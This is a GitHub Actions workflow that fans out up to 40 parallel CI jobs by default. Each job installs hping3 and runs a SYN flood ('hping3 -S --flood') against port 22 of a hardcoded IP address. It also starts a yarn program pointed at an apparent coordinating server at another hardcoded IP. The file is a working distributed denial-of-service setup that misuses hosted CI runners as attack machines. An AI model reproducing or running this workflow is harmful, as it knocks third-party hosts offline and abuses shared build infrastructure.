on:
  workflow_call:
    inputs:
      start_index:
        required: true
        type: string
      batch_size:
        required: false
        type: string
        default: '40'
      total_jobs:
        required: true
        type: string
      run_id:
        required: false
        type: string

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

jobs:
  generate-matrix:
    runs-on: ubuntu-latest
    outputs:
      matrix: ${{ steps.set-matrix.outputs.matrix }}
    steps:
      - name: Generate Matrix
        id: set-matrix
        run: |
          start_index=$(echo "${{ inputs.start_index }}" | tr -d '"')
          batch_size=$(echo "${{ inputs.batch_size }}" | tr -d '"')
          if [ "$(expr "$total_jobs" + 0)" -lt "$(expr "$batch_size" + 0)" ]; then
            batch_size=$total_jobs
          fi
          end=$((start_index + batch_size - 1))
          jobs=$(seq $start_index $end | jq -R . | jq -s .)
          matrix="{\"job\":$jobs}"
          echo "matrix=$(echo $matrix | tr -d '\n')" >> $GITHUB_OUTPUT

  job:
    needs: generate-matrix
    strategy:
      matrix: ${{fromJson(needs.generate-matrix.outputs.matrix)}}
    runs-on: ubuntu-latest
    env:
      RUN_ID: ${{ inputs.run_id || github.run_id }}
      TOTAL_JOBS: ${{ inputs.total_jobs }}
      MATRIX_JOB_ID: ${{ matrix.job }}
      SOCKET_SERVER_URL: http://43.133.204.21:3000
    steps:
      - uses: actions/checkout@v4
        with:
          repository: Buc014960kPearson/Buc014960kPearson
          ref: main

      - name: Check CPU Info
        run: |
          # lscpu
          # cat /proc/cpuinfo | grep "^processor" | wc -l
          # nproc
          ip link show eth0
          sudo ip link set eth0 txqueuelen 10000
          # sysctl net.core.wmem_max
          # cat /proc/sys/net/core/wmem_max
          # sudo sysctl -w net.core.wmem_max=16777216

      - name: Step 1
        run: |
          ip link show eth0
          yarn

          sudo apt install hping3 -q

          # getent ahostsv4 ioswy.com
          # IP=$(getent ahostsv4 ioswy.com | awk '{print $1}' | head -n 1)
          IP=43.155.24.223
          echo "IP=$IP" >> $GITHUB_ENV

          timeout 120s yarn start

      - name: Step 2
        run: |
          echo $IP
          echo "当前时间：$(date "+%Y-%m-%d %H:%M:%S")"
          sudo timeout 60s hping3 -S --flood -V -d 70000 -p 22 -s 1000-65535 $IP
          
          # for i in {1..4}; do
          #   sudo timeout 60s taskset -c $((i-1)) hping3 -S --flood -V -d 65400 -p 22 -s $((1000 + 16134 * (i-1)))-$((1000 + 16134 * i - 1)) $IP &
          # done
          # wait

          # sudo timeout 10s hping3 -S --flood -V -d 65400 -p 22 $IP
